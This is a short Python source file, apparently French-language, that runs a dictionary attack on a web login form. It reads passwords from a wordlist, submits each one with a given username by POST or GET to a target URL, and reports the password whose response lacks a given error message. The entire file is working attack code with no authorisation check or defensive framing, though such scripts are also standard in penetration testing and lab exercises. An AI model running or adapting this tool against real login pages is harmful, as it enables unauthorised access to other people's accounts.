bruteforce/bruteWeb.py


1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37

import sys
import requests 

def bruteforce(method,url,username,password,error_msg):
    if method == "post":
        reponse=requests.post(url,data={
        "username":username,
        "password":password
        })
    elif method == "get":
        reponse=requests.get(url,params={
        "username":username,
        "password":password
        })

    if error_msg in reponse.text:
        #print("erreur : ",password)
        pass
    else:
        print("trouvé : ",password)
        return True

if __name__ == "__main__":
    method = sys.argv[1]
    url = sys.argv[2]
    username = sys.argv[3]
    dico = sys.argv[4]
    error_msg= sys.argv[5]
    with open(dico, 'r') as wordlist:
        for ligne in wordlist.readlines():
            # le fichier nmap.lst à des commentaires en début de fichier
            if ligne[0] != "#":
                password=ligne.strip()
                if bruteforce(method,url,username,password,error_msg) is True:
                    break